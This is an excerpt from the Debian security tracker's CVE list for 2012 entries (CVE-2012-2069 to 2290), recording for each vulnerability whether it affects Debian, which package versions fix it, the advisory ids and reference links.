CVE-2012-2290 (The client in EMC NetWorker Module for Microsoft Applications (NMM) ...)
	NOT-FOR-US: EMC NetWorker Module for Microsoft Applications
CVE-2012-2289 (EMC ApplicationXtender Desktop before 6.5 SP2 and ApplicationXtender ...)
	NOT-FOR-US: EMC
CVE-2012-2288 (Format string vulnerability in the nsrd RPC service in EMC NetWorker ...)
	NOT-FOR-US: EMC NetWorker
CVE-2012-2287 (The authentication functionality in EMC RSA Authentication Agent 7.1 ...)
	NOT-FOR-US: EMC RSA Authentication agent
CVE-2012-2286 (Unspecified vulnerability in EMC RSA Adaptive Authentication ...)
	NOT-FOR-US: EMC RSA Authentication agent
CVE-2012-2285 (EMC Cloud Tiering Appliance (aka CTA, formerly FMA) 9.0 and earlier, ...)
	NOT-FOR-US: EMC Cloud Tiering Appliance
CVE-2012-2284 (The (1) install and (2) upgrade processes in EMC NetWorker Module for ...)
	NOT-FOR-US: EMC NetWorker Module for Microsoft Applications
CVE-2012-2283 (The Iomega Home Media Network Hard Drive with EMC Lifeline firmware ...)
	NOT-FOR-US: Iomega Home Media Network Hard Drive
CVE-2012-2282 (EMC Celerra Network Server 6.x before 6.0.61.0, VNX 7.x before ...)
	NOT-FOR-US: EMC Celerra/VNX/VNXe
CVE-2012-2281 (EMC RSA Access Manager Server 6.x before 6.1 SP4 and RSA Access ...)
	NOT-FOR-US: RSA Access Manager
	NOTE: http://seclists.org/bugtraq/2012/Jul/36
CVE-2012-2280 (EMC RSA Authentication Manager 7.1 before SP4 P14 and RSA SecurID ...)
	NOT-FOR-US: RSA Authentication Agent
CVE-2012-2279 (Open redirect vulnerability in the Security Console in EMC RSA ...)
	NOT-FOR-US: RSA Authentication Agent
CVE-2012-2278 (Multiple cross-site scripting (XSS) vulnerabilities in the (1) ...)
	NOT-FOR-US: RSA Authentication Agent
CVE-2012-2277 (The IRM Server in EMC Documentum Information Rights Management 4.x ...)
	NOT-FOR-US: EMC Documentum Information Rights Management
CVE-2012-2276 (The IRM Server in EMC Documentum Information Rights Management 4.x ...)
	NOT-FOR-US: EMC Documentum Information Rights Management
CVE-2012-2275 (Multiple cross-site request forgery (CSRF) vulnerabilities in TestLink ...)
	NOT-FOR-US: TestLink
CVE-2012-2274 (Cross-site scripting (XSS) vulnerability in pivotx/ajaxhelper.php in ...)
	NOT-FOR-US: PivotX
CVE-2012-2273 (Comodo Internet Security before 5.10.228257.2253 on Windows 7 x64 ...)
	NOT-FOR-US: Comodo Internet Security
CVE-2012-2272
	RESERVED
CVE-2012-2271 (Buffer overflow in the InitLicenKeys function in a certain ActiveX ...)
	NOT-FOR-US: SkinCrafter
CVE-2012-2270 (Open redirect vulnerability in index.php (aka the Login Page) in ...)
	- owncloud 3.0.3-1
CVE-2012-2269 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before ...)
	- owncloud 3.0.2-1
CVE-2011-5089 (Buffer overflow in the Security Login ActiveX controls in ICONICS ...)
	NOT-FOR-US: ICONICS, BizViz
CVE-2011-5088 (The GENESIS32 IcoSetServer ActiveX control in ICONICS GENESIS32 9.21 ...)
	NOT-FOR-US: ICONICS GENESIS32, BizViz
CVE-2011-5087 (Unspecified vulnerability in AdAstrA TRACE MODE Data Center allows ...)
	NOT-FOR-US: AdAstrA TRACE MODE Data Center
CVE-2011-5086 (https50.ocx in IP*Works! SSL in the server in Unitronics UniOPC before ...)
	NOT-FOR-US: Unitronics UniOPC
CVE-2012-2268 (master.exe in the SNMP Master Agent in RealNetworks Helix Server and ...)
	NOT-FOR-US: RealNetworks Helix
CVE-2012-2267 (master.exe in the SNMP Master Agent in RealNetworks Helix Server and ...)
	NOT-FOR-US: RealNetworks Helix
CVE-2012-2266
	RESERVED
CVE-2012-2265
	RESERVED
CVE-2012-2264
	RESERVED
CVE-2012-2263
	RESERVED
CVE-2012-2262
	RESERVED
CVE-2012-2261
	RESERVED
CVE-2012-2260
	RESERVED
CVE-2012-2259
	RESERVED
CVE-2012-2258
	RESERVED
CVE-2012-2257
	RESERVED
CVE-2012-2256
	RESERVED
CVE-2012-2255
	RESERVED
CVE-2012-2254
	RESERVED
CVE-2012-2253 (Cross-site scripting (XSS) vulnerability in group/members.php in ...)
	{DSA-2591-1}
	- mahara 1.5.1-3.1 (bug #695789)
CVE-2012-2252 (Incomplete blacklist vulnerability in rssh before 2.3.4, when the ...)
	{DSA-2578-1}
	- rssh 2.3.3-6
CVE-2012-2251 (rssh 2.3.2, as used by Debian, Fedora, and others, when the rsync ...)
	{DSA-2578-1}
	- rssh 2.3.3-6
CVE-2012-2250
	RESERVED
	- tor 0.2.3.24-rc-1 (low)
	[squeeze] - tor (Minor issue)
CVE-2012-2249
	RESERVED
	- tor 0.2.3.23-rc-1 (low)
	[squeeze] - tor (Minor issue)
CVE-2012-2248 [build-influenced PATH set in dhclient]
	RESERVED
	- isc-dhcp 4.2.4-3 (bug #690532)
	[wheezy] - isc-dhcp 4.2.2.dfsg.1-5+deb70u2
	[squeeze] - isc-dhcp (CLIENT_PATH is not correctly defined)
	NOTE: Debian-specific
CVE-2012-2247 (Cross-site scripting (XSS) vulnerability in Mahara 1.4.x before 1.4.5 ...)
	{DSA-2591-1}
	- mahara 1.5.1-3
	NOTE: https://mahara.org/interaction/forum/topic.php?id=4938
	NOTE: https://bugs.launchpad.net/mahara/+bug/1061980
CVE-2012-2246 (Mahara 1.4.x before 1.4.5 and 1.5.x before 1.5.4 allows remote ...)
	{DSA-2591-1}
	- mahara 1.5.1-3
	NOTE: https://mahara.org/interaction/forum/topic.php?id=493
	NOTE: https://bugs.launchpad.net/mahara/+bug/1057240
CVE-2012-2245
	RESERVED
CVE-2012-2244 (Mahara 1.4.x before 1.4.5 and 1.5.x before 1.5.4 allows remote ...)
	{DSA-2591-1}
	- mahara 1.5.1-3
	NOTE: https://mahara.org/interaction/forum/topic.php?id=4936
	NOTE: https://bugs.launchpad.net/mahara/+bug/1057238
CVE-2012-2243 (Cross-site scripting (XSS) vulnerability in Mahara 1.4.x before 1.4.5 ...)
	{DSA-2591-1}
	- mahara 1.5.1-3
	NOTE: https://mahara.org/interaction/forum/topic.php?id=4937
	NOTE: https://bugs.launchpad.net/mahara/+bug/1055232
	NOTE: https://bugs.launchpad.net/mahara/+bug/1063480
CVE-2012-2242 (scripts/dget.pl in devscripts before 2.10.73 allows remote attackers ...)
	{DSA-2549-1}
	- devscripts 2.12.3
CVE-2012-2241 (scripts/dget.pl in devscripts before 2.12.3 allows remote attackers to ...)
	{DSA-2549-1}
	- devscripts 2.12.3
CVE-2012-2240 (scripts/dscverify.pl in devscripts before 2.12.3 allows remote ...)
	{DSA-2549-1}
	- devscripts 2.12.3
CVE-2012-2239 (Mahara 1.4.x before 1.4.4 and 1.5.x before 1.5.3 allows remote ...)
	{DSA-2591-1}
	- mahara 1.5.1-3
CVE-2012-2238
	RESERVED
	- tryton-server (only affected 2.4, in experimental)
CVE-2012-2237
	RESERVED
	{DSA-2540-1}
	- mahara 1.5.1-2
CVE-2012-2236 (SQL injection vulnerability in users.php in PHP Gift Registry 1.5.5 ...)
	NOT-FOR-US: PHP Gift Registry
CVE-2012-2235 (Cross-site scripting (XSS) vulnerability in Support Incident Tracker ...)
	NOT-FOR-US: Support Incident Tracker
CVE-2012-2234 (Cross-site scripting (XSS) vulnerability in sources/users.queries.php ...)
	NOT-FOR-US: TeamPass.net
CVE-2012-2233
	RESERVED
CVE-2012-2232
	RESERVED
CVE-2012-2231
	RESERVED
CVE-2012-2230 (Cloudera Manager 3.7.x before 3.7.5 and Service and Configuration ...)
	NOT-FOR-US: Cloudera Manager
CVE-2012-2229
	RESERVED
CVE-2012-2228
	RESERVED
CVE-2012-2227 (Directory traversal vulnerability in update/index.php in PluXml before ...)
	NOT-FOR-US: PluXml
CVE-2012-2226
	RESERVED
CVE-2012-2225 (360zip 1.93beta allows remote attackers to execute arbitrary code via ...)
	NOT-FOR-US: 360zip
CVE-2012-2224 (Xunlei Thunder before 7.2.6 allows remote attackers to execute ...)
	NOT-FOR-US: Xunlei Thunder
CVE-2012-2223 (The xplat agent in Novell ZENworks Configuration Management (ZCM) ...)
	NOT-FOR-US: Novell ZENworks Configuration Management
CVE-2012-2222
	RESERVED
CVE-2012-2221
	RESERVED
CVE-2012-2220
	RESERVED
CVE-2012-2219
	RESERVED
CVE-2012-2218
	RESERVED
CVE-2012-2217 (The HTC IQRD service for Android on the HTC EVO 4G before 4.67.651.3, ...)
	NOT-FOR-US: Android
CVE-2012-2216
	RESERVED
CVE-2012-2095 [wicd command execution with root privileges]
	RESERVED
	- wicd 1.7.2.4-1 (low; bug #668397)
	[squeeze] - wicd 1.7.0+ds1-5+squeeze2
CVE-2012-2215 (Directory traversal vulnerability in the Preboot Service in Novell ...)
	NOT-FOR-US: Novell ZENworks Configuration Management
CVE-2012-2214 (proxy.c in libpurple in Pidgin before 2.10.4 does not properly handle ...)
	- pidgin 2.10.4-1
	NOTE: http://www.pidgin.im/news/security/?id=62
CVE-2012-2213 (** DISPUTED ** Squid 3.1.9 allows remote attackers to bypass the ...)
	NOT-FOR-US: Disputed Squid access bypass, probably user error and minor impact anyway
CVE-2012-2212 (** DISPUTED ** McAfee Web Gateway 7.0 allows remote attackers to ...)
	NOT-FOR-US: McAfee Web Gateway
CVE-2012-2211 (Cross-site scripting (XSS) vulnerability in ...)
	- egroupware
CVE-2012-2210 (The Sony Bravia TV KDL-32CX525 allows remote attackers to cause a ...)
	NOT-FOR-US: Sony Bravia
CVE-2012-2209 (Multiple cross-site scripting (XSS) vulnerabilities in admin.php in ...)
	- piwigo (bug #685364)
CVE-2012-2208 (Directory traversal vulnerability in upgrade.php in Piwigo before ...)
	- piwigo (bug #685364)
CVE-2012-2207
	RESERVED
CVE-2012-2206 (The Web Gateway component in IBM WebSphere MQ File Transfer Edition ...)
	NOT-FOR-US: IBM WebSphere MQ File Transfer Edition
CVE-2012-2205 (Cross-site scripting (XSS) vulnerability in IBM Rational ClearQuest ...)
	NOT-FOR-US: IBM Rational ClearQuest
CVE-2012-2204
	RESERVED
CVE-2012-2203 (IBM Global Security Kit (aka GSKit) before 8.0.14.22, as used in IBM ...)
	NOT-FOR-US: IBM Global Security Kit
CVE-2012-2202 (Directory traversal vulnerability in javatester_init.php in IBM Lotus ...)
	NOT-FOR-US: IBM Lotus Protector, IBM ISS Proventia Network Mail Security System
CVE-2012-2201
	RESERVED
CVE-2012-2200 (The default configuration of sendmail in IBM AIX 6.1 and 7.1, and VIOS ...)
	NOT-FOR-US: sendmail configuration in AIX
CVE-2012-2199 (The server message channel agent in the queue manager in the server in ...)
	NOT-FOR-US: IBM WebSphere MQ
CVE-2012-2198
	RESERVED
CVE-2012-2197 (Stack-based buffer overflow in the Java Stored Procedure ...)
	NOT-FOR-US: IBM DB2
CVE-2012-2196 (IBM DB2 9.1 before FP12, 9.5 through FP9, 9.7 through FP6, 9.8 through ...)
	NOT-FOR-US: IBM DB2
CVE-2012-2195
	RESERVED
CVE-2012-2194 (Directory traversal vulnerability in the SQLJ.DB2_INSTALL_JAR stored ...)
	NOT-FOR-US: IBM DB2
CVE-2012-2193 (Cross-site scripting (XSS) vulnerability in Query Studio in IBM Cognos ...)
	NOT-FOR-US: IBM Cognos Business Intelligence
CVE-2012-2192 (The socketpair function in IBM AIX 5.3, 6.1, and 7.1 and VIOS ...)
	NOT-FOR-US: AIX
CVE-2012-2191 (IBM Global Security Kit (aka GSKit) before 8.0.14.22, as used in IBM ...)
	NOT-FOR-US: IBM Global Security Kit
CVE-2012-2190 (IBM Global Security Kit (aka GSKit), as used in IBM HTTP Server in IBM ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2012-2189
	RESERVED
CVE-2012-2188 (IBM Power Hardware Management Console (HMC) 7R3.5.0 before SP4, ...)
	NOT-FOR-US: IBM Power Hardware Management Console
CVE-2012-2187 (IBM Remote Supervisor Adapter II firmware for System x3650, x3850 M2, ...)
	NOT-FOR-US: IBM Remote Supervisor Adapter
CVE-2012-2186 (Incomplete blacklist vulnerability in main/manager.c in Asterisk Open ...)
	{DSA-2550-1}
	- asterisk 1:1.8.13.1~dfsg-1 (bug #680470)
CVE-2012-2185 (IBM Maximo Asset Management 6.2 through 7.5, as used in SmartCloud ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2012-2184 (Session fixation vulnerability in IBM Maximo Asset Management 7.1 ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2012-2183 (Session fixation vulnerability in IBM Maximo Asset Management 6.2 ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2012-2182
	RESERVED
CVE-2012-2181 (Directory traversal vulnerability in the Dojo module in IBM WebSphere ...)
	NOT-FOR-US: IBM WebSphere not in Debian
CVE-2012-2180 (The chaining functionality in the Distributed Relational Database ...)
	NOT-FOR-US: IBM DB2
CVE-2012-2179 (libodm.a in IBM AIX 5.3, 6.1, and 7.1 allows local users to overwrite ...)
	NOT-FOR-US: AIX
CVE-2012-2178
	RESERVED
CVE-2012-2177 (Cross-site scripting (XSS) vulnerability in IBM Cognos Business ...)
	NOT-FOR-US: IBM Cognos Business Intelligence
CVE-2012-2176 (Multiple stack-based buffer overflows in a certain ActiveX control in ...)
	NOT-FOR-US: IBM Lotus Quickr
CVE-2012-2175 (Buffer overflow in the Attachment_Times method in a certain ActiveX ...)
	NOT-FOR-US: IBM Lotus iNotes
CVE-2012-2174 (The URL handler in IBM Lotus Notes 8.x before 8.5.3 FP2 allows remote ...)
	NOT-FOR-US: Notes
CVE-2012-2173 (The ODBC driver in IBM Security AppScan Source 7.x and 8.x before 8.6 ...)
	NOT-FOR-US: AppScan
CVE-2012-2172 (Cross-site scripting (XSS) vulnerability in SoftwareRegistration.do in ...)
	NOT-FOR-US: IBM System Storage DS Storage Manager
CVE-2012-2171 (SQL injection vulnerability in ModuleServlet.do in the Storage Manager ...)
	NOT-FOR-US: IBM System Storage DS Storage Manager
CVE-2012-2170 (The Application Snoop Servlet in IBM WebSphere Application Server 7.0 ...)
	NOT-FOR-US: WebSphere
CVE-2012-2169 (Cross-site scripting (XSS) vulnerability in the file-upload ...)
	NOT-FOR-US: IBM Rational ClearQuest
CVE-2012-2168 (IBM Rational ClearQuest 7.1.x before 7.1.2.7 and 8.x before 8.0.0.3 ...)
	NOT-FOR-US: IBM Rational ClearQuest
CVE-2012-2167 (The IBM XIV Storage System Gen3 before 11.1.0.a allows remote ...)
	NOT-FOR-US: IBM XIV Storage System Gen3
CVE-2012-2166
	RESERVED
CVE-2012-2165 (IBM Rational ClearQuest 7.1.x before 7.1.2.7 and 8.x before 8.0.0.3, ...)
	NOT-FOR-US: IBM Rational ClearQuest
CVE-2012-2164 (The Web client in IBM Rational ClearQuest 7.1.x before 7.1.2.7 and 8.x ...)
	NOT-FOR-US: IBM Rational ClearQuest
CVE-2012-2163 (IBM Scale Out Network Attached Storage (SONAS) 1.1 through 1.3.1 ...)
	NOT-FOR-US: IBM Scale Out Network Attached Storage
CVE-2012-2162 (The Web Server Plug-in in IBM WebSphere Application Server (WAS) 8.0 ...)
	NOT-FOR-US: WebSphere
CVE-2012-2161 (Cross-site scripting (XSS) vulnerability in deferredView.jsp in IBM ...)
	NOT-FOR-US: IBM Security AppScan Source
CVE-2012-2160
	RESERVED
CVE-2012-2159 (Open redirect vulnerability in IBM Eclipse Help System (IEHS), as used ...)
	NOT-FOR-US: IBM Eclipse Help System
CVE-2012-2158
	RESERVED
CVE-2012-2157
	RESERVED
CVE-2012-2156 (Multiple cross-site scripting (XSS) vulnerabilities in Plume CMS 1.2.4 ...)
	NOT-FOR-US: Plume CMS
CVE-2012-2155 (Cross-site request forgery (CSRF) vulnerability in the CDN2 Video ...)
	NOT-FOR-US: Drupal addon not packaged
CVE-2012-2154 (Cross-site scripting (XSS) vulnerability in the CDN2 Video module 6.x ...)
	NOT-FOR-US: Drupal addon not packaged
CVE-2012-2153 (Drupal 7.x before 7.14 does not properly restrict access to nodes in a ...)
	- drupal7 7.14-1
CVE-2012-2152 (Stack-based buffer overflow in the get_packet method in socket.c in ...)
	{DSA-2498-1}
	- dhcpcd 1:3.2.3-11 (bug #671265)
	NOTE: http://www.openwall.com/lists/oss-security/2012/05/02/4
CVE-2012-2151 (Multiple cross-site scripting (XSS) vulnerabilities in SPIP 1.9.x ...)
	{DSA-2461-1}
	- spip 2.1.13-1 (low; bug #671264)
CVE-2012-2150
	RESERVED
CVE-2012-2149 (The WPXContentListener::_closeTableRow function in ...)
	- libwpd 0.9.4-1
	NOTE: http://permalink.gmane.org/gmane.comp.security.full-disclosure/85789
	NOTE: http://libwpd.git.sourceforge.net/git/gitweb.cgi?p=libwpd/libwpd;a=blobdiff;f=src/lib/WPXOLEStream.cpp;h=5bb11bd14912bda74c86392b20eb3d07207b7edb;hp=12b9340584855dca85cd429c1d3cf8a8e252e293;hb=7ce74979eef53d575ca433b525b6dff29cac5fd1;hpb=12560d3cb0f5d998b6d73bb6c881ec815a775932
CVE-2012-2148
	RESERVED
	- jbossas4 (Only builds a few libraries, not the full application server)
CVE-2012-2147 (munin-cgi-graph in Munin 2.0 rc4 allows remote attackers to cause a ...)
	- munin 2.0~rc6-1 (bug #670811)
	[squeeze] - munin (Vulnerable code not present)
CVE-2012-2146 (Elixir 0.8.0 uses Blowfish in CFB mode without constructing a unique ...)
	- elixir (low; bug #670919)
	[squeeze] - elixir (Minor issue)
	[wheezy] - elixir (Minor issue)
CVE-2012-2145 (Apache Qpid 0.17 and earlier does not properly restrict incoming ...)
	- qpid-cpp 0.16-1 (bug #672124)
CVE-2012-2144 (Session fixation vulnerability in OpenStack Dashboard (Horizon) ...)
	- horizon 2012.1-4 (bug #671604)
CVE-2012-2143 (The crypt_des (aka DES-based crypt) function in FreeBSD before ...)
	{DSA-2491-1}
	- postgresql-9.1 9.1.4-1
	- postgresql-8.4 8.4.12-1
	- php5 5.3.3-1
	NOTE: Uses the unaffected system libraries since 5.3.3
CVE-2012-2142
	RESERVED
CVE-2012-2141 (Array index error in the handle_nsExtendOutput2Table function in ...)
	- net-snmp 5.4.3~dfsg-2.5 (low; bug #672492)
	[squeeze] - net-snmp (Minor issue)
	NOTE: Red Hat patch: https://bugzilla.redhat.com/attachment.cgi?id=580443&action=diff
CVE-2012-2140 (The Mail gem before 2.4.3 for Ruby allows remote attackers to execute ...)
	- ruby-mail 2.4.4-1
CVE-2012-2139 (Directory traversal vulnerability in ...)
	- ruby-mail 2.4.4-1
CVE-2012-2138 (The @CopyFrom operation in the POST servlet in the ...)
	NOT-FOR-US: Apache Sling
	NOTE: http://lists.grok.org.uk/pipermail/full-disclosure/2012-July/087554.html
CVE-2012-2137 (Buffer overflow in virt/kvm/irq_comm.c in the KVM subsystem in the ...)
	- linux 3.2.20-1
CVE-2012-2136 (The sock_alloc_send_pskb function in net/core/sock.c in the Linux ...)
	- linux 3.2.20-1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-46
CVE-2012-2135 (The utf-16 decoder in Python 3.1 through 3.3 does not update the ...)
	- python3.1 (bug #670389)
	- python3.2 3.2.3-1 (bug #670389)
	- python3.3 3.3.1-1
	NOTE: http://bugs.python.org/issue14579
CVE-2012-2134
	RESERVED
	NOT-FOR-US: Dynamic LDAP backend plugin for BIND
CVE-2012-2133 (Use-after-free vulnerability in the Linux kernel before 3.3.6, when ...)
	{DSA-2469-1}
	- linux-2.6 3.2.19-1
CVE-2012-2132 (libsoup 2.32.2 and earlier does not validate certificates or clear the ...)
	- midori (unimportant; bug #672880)
	NOTE: https://bugzilla.novell.com/show_bug.cgi?id=758431
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=817692
CVE-2012-2131 (Multiple integer signedness errors in crypto/buffer/buffer.c in ...)
	{DSA-2454-2}
	- openssl (only affected patch against 0.9.8)
	NOTE: http://marc.info/?l=openssl-dev&m=133525318514423&w=2
CVE-2012-2130
	RESERVED
	- polarssl 1.1.2-1
	[squeeze] - polarssl (Introduced in 0.99-pre4)
CVE-2012-2129 (Cross-site scripting (XSS) vulnerability in doku.php in DokuWiki ...)
	- dokuwiki 0.0.20120125a-1 (low; bug #670917)
	[squeeze] - dokuwiki
	NOTE: http://secunia.com/advisories/48848/
CVE-2012-2128 (** DISPUTED ** ...)
	- dokuwiki 0.0.20120125a-1
	NOTE: http://bugs.dokuwiki.org/index.php?do=details&task_id=2488
CVE-2012-2127 (fs/proc/root.c in the procfs implementation in the Linux kernel before ...)
	- linux-2.6 3.2-1
	[squeeze] - linux-2.6 (Introduced in 3.1)
CVE-2012-2126
	RESERVED
	- rubygems 1.8.24-1 (bug #670228)
CVE-2012-2125
	RESERVED
	- rubygems 1.8.24-1 (bug #670228)
CVE-2012-2124 (functions/imap_general.php in SquirrelMail, as used in Red Hat ...)
	- squirrelmail (Incorrect Red Hat security update)
CVE-2012-2123 (The cap_bprm_set_creds function in security/commoncap.c in the Linux ...)
	{DSA-2469-1}
	- linux-2.6 3.2.16-1
CVE-2012-2122 (sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before ...)
	{DSA-2496-1}
	- mysql-5.1 (bug #677018)
	- mysql-5.5 5.5.24+dfsg-1
	NOTE: https://www.secmaniac.com/blog/2012/06/11/massive-mysql-authentication-bypass-exploit/
	NOTE: http://seclists.org/oss-sec/2012/q2/493
	NOTE: Issue is only triggered with a specific optimisation in glibc enabled; no builds in Debian are known to be affected.
	NOTE: Fixed versions indicate application of the upstream patch, which prevents the issue regardless of optimisation settings.
CVE-2012-2121 (The KVM implementation in the Linux kernel before 3.3.4 does not ...)
	{DSA-2668-1}
	- linux-2.6 3.2.17-1
CVE-2012-2120 (latex2man in texlive-extra-utils 2011.20120322, and possibly other ...)
	- texlive-extra 2012.20130315-1 (low; bug #668779)
	[wheezy] - texlive-extra (Minor issue)
	[squeeze] - texlive-extra (Minor issue)
CVE-2012-2119 (Buffer overflow in the macvtap device driver in the Linux kernel ...)
	- linux 3.2.20-1
	[squeeze] - linux-2.6 (Vulnerable code not present, was added in 3.1)
CVE-2012-2118 (Format string vulnerability in the LogVHdrMessageVerb function in ...)
	- xorg-server 2:1.12.1.902-1 (bug #673148)
	[squeeze] - xorg-server (Introduced in 1.10)
	NOTE: http://lists.x.org/pipermail/xorg-devel/2012-May/031411.html
CVE-2012-2117 (Cross-site scripting (XSS) vulnerability in the Gigya - Social ...)
	NOT-FOR-US: Drupal plugin (Gigya - Social Optimization) not in Debian
CVE-2012-2116 (Cross-site request forgery (CSRF) vulnerability in the Commerce ...)
	NOT-FOR-US: Drupal plugin (Commerce Reorder) not in Debian
CVE-2012-2115 (SQL injection vulnerability in interface/login/validateUser.php in ...)
	NOT-FOR-US: OpenEMR not in Debian
CVE-2012-2114 (Stack-based buffer overflow in fprintf in musl before 0.8.8 and ...)
	NOT-FOR-US: musl libc not in Debian
CVE-2012-2113 (Multiple integer overflows in tiff2pdf in libtiff before 4.0.2 allow ...)
	{DSA-2552-1}
	- tiff 4.0.2-1 (bug #678140)
	- tiff3 (The tiff-tools package is only built from the tiff source package)
CVE-2012-2112 (Cross-site scripting (XSS) vulnerability in the Exception Handler in ...)
	{DSA-2455-1}
	- typo3-src 4.5.15+dfsg1-1 (bug #669158)
	NOTE: http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2012-002/
CVE-2012-2111 (The (1) CreateAccount, (2) OpenAccount, (3) AddAccountRights, and (4) ...)
	{DSA-2463-1}
	- samba 2:3.6.5-1
	NOTE: http://www.samba.org/samba/history/samba-3.6.5.html
	NOTE: According to the release notes Samba 3.4.x to 3.6.4 are affected
CVE-2012-2110 (The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL ...)
	{DSA-2454-1}
	- openssl 1.0.1a-1
	NOTE: http://www.openssl.org/news/secadv_20120419.txt
CVE-2012-2109 (SQL injection vulnerability in wp-load.php in the BuddyPress plugin ...)
	NOT-FOR-US: wordpress buddypress plugin
CVE-2012-2108
	RESERVED
	- csound 1:5.17.6~dfsg-1 (low; bug #661197)
	[squeeze] - csound (Minor issue)
CVE-2012-2107
	RESERVED
	- csound 1:5.17.6~dfsg-1 (bug #661197)
	[squeeze] - csound (Minor issue)
CVE-2012-2106
	RESERVED
	- csound 1:5.17.6~dfsg-1 (bug #661197)
	[squeeze] - csound (Minor issue)
CVE-2012-2105 (Multiple SQL injection vulnerabilities in login.php in Timesheet Next ...)
	NOT-FOR-US: tsheetx
CVE-2012-2104 (cgi-bin/munin-cgi-graph in Munin 2.x writes data to a log file without ...)
	- munin 2.0~rc6-1 (bug #668666)
	[squeeze] - munin (Vulnerable code not present)
	[lenny] - munin (Vulnerable code not present)
CVE-2012-2103 (The qmailscan plugin for Munin 1.4.5 allows local users to overwrite ...)
	- munin 2.0~rc6-1 (bug #668778)
	[squeeze] - munin (Vulnerable code not present)
	[lenny] - munin (Vulnerable code not present)
CVE-2012-2102 (MySQL 5.1.x before 5.1.62 and 5.5.x before 5.5.22 allows remote ...)
	{DSA-2496-1}
	- mysql-5.1 5.1.62-1 (low; bug #670636)
	- mysql-5.5 5.5.24+dfsg-1 (low)
CVE-2012-2101 (Openstack Compute (Nova) Folsom, 2012.1, and 2011.3 does not limit the ...)
	- nova 2012.1-2 (bug #670637)
CVE-2012-2100 (The ext4_fill_flex_info function in fs/ext4/super.c in the Linux ...)
	- linux-2.6 3.2.2-1
	[squeeze] - linux-2.6 2.6.32-41squeeze1
	NOTE: incomplete fix of CVE-2009-4307, introducing another issue:
	NOTE: https://lkml.org/lkml/2012/2/20/422
CVE-2012-2099 (Multiple cross-site scripting (XSS) vulnerabilities in Wikidforum 2.10 ...)
	NOT-FOR-US: Wikidforum
CVE-2012-2098 (Algorithmic complexity vulnerability in the sorting algorithms in ...)
	- libcommons-compress-java 1.4.1-1 (low; bug #674448)
	[squeeze] - libcommons-compress-java (Minor issue)
CVE-2012-2097 (Cross-site request forgery (CSRF) vulnerability in the Autosave module ...)
	NOT-FOR-US: Drupal module Autosave
CVE-2012-2096 (The Fivestar module 6.x-1.x before 6.x-1.20 for Drupal does not ...)
	NOT-FOR-US: Drupal module Fivestar
CVE-2012-2094 (Cross-site scripting (XSS) vulnerability in the refresh mechanism in ...)
	- horizon 2012.1-3
CVE-2012-2093 (src/common/latex.py in Gajim 0.15 allows local users to overwrite ...)
	{DSA-2453-2 DSA-2453-1}
	- gajim 0.15-1.1 (low; bug #668710)
CVE-2012-2092
	RESERVED
	- cobbler (bug #545583)
CVE-2012-2091 (Multiple buffer overflows in FlightGear 2.6 and earlier and SimGear ...)
	- flightgear 2.6.0-1.1 (unimportant; bug #669025)
	NOTE: Negligible security impact, very obscure attack vector
CVE-2012-2090 (Multiple format string vulnerabilities in FlightGear 2.6 and earlier ...)
	- simgear (unimportant; bug #669024)
	- flightgear 2.6.0-1.1 (unimportant; bug #669025)
	NOTE: Negligible security impact, very obscure attack vector
CVE-2012-2089 (Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module ...)
	- nginx 1.1.19-1
	[squeeze] - nginx (Vulnerable code not present)
CVE-2012-2088 (Integer signedness error in the TIFFReadDirectory function in ...)
	{DSA-2552-1}
	- tiff 4.0-1 (bug #678140)
	- tiff3 3.9.6-6
CVE-2012-2087
	RESERVED
CVE-2012-2086 (SQL injection vulnerability in the get_last_conversation_lines ...)
	{DSA-2453-2 DSA-2453-1}
	- gajim 0.15-1 (low; bug #668038)
CVE-2012-2085 (The exec_command function in common/helpers.py in Gajim before 0.15 ...)
	{DSA-2453-2 DSA-2453-1}
	- gajim 0.15-1 (medium; bug #668038)
CVE-2012-2084 (Cross-site scripting (XSS) vulnerability in the Printer, email and PDF ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2083 (Cross-site scripting (XSS) vulnerability in the ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2082 (Cross-site scripting (XSS) vulnerability in the Chaos tool suite (aka ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2081 (The Organic Groups (OG) module 6.x-2.x before 6.x-2.3 for Drupal does ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2080 (Cross-site request forgery (CSRF) vulnerability in the Node Limit ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2079
	RESERVED
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2078
	RESERVED
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2077 (Cross-site request forgery (CSRF) vulnerability in the ShareThis ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2076 (Cross-site scripting (XSS) vulnerability in the administration forms ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2075 (Cross-site scripting (XSS) vulnerability in the Contact Save module ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2074 (Unspecified vulnerability in certain default views in the Ubercart ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2073 (The Bundle copy module 7.x-1.x before 7.x-1.1 for Drupal does not ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2072 (Cross-site scripting (XSS) vulnerability in the Share Buttons ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2071 (Cross-site scripting (XSS) vulnerability in the Contact Forms module ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2070 (Cross-site scripting (XSS) vulnerability in the MultiBlock module ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
CVE-2012-2069 (Cross-site request forgery (CSRF) vulnerability in the Wishlist module ...)
	NOT-FOR-US: Drupal addon module not packaged in Debian
